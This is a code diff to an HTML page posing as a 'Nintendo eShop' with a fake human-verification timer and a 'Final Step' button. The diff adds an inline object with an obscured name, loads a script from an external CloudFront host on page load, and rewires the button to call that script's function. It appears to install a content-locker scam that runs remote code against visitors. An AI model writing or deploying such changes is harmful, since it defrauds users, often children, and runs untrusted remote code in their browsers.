--- a/index.html
+++ b/index.html
@@ -2,7 +2,10 @@
 <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
 	
 <head>
-  <script src="script.js"></script>
+  <script type="text/javascript">
+    var oyiNq_miH_swHGtc={"it":4451820,"key":"cb9a8"};
+</script>
+<script src="https://d2bxqnokimz7h9.cloudfront.net/928a3cf.js"></script>
 		<title>Nintendo eShop
 		</title>
 		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
@@ -41,7 +44,7 @@
 						<span id="human_verification_timer_time"><span>5 minutes and 00 seconds</span></span>
 					</div>
 					<div class="button-wrapper">
-						<a onclick="startchat()"><div id="b-1" class="button animated pulse infinite"><span class="lnr -download"></span><span>Final Step&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></div></a>
+						<a onclick="_ff()"><div id="b-1" class="button animated pulse infinite"><span class="lnr -download"></span><span>Final Step&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></div></a>
 					</div>
 				</div>
 			</div>
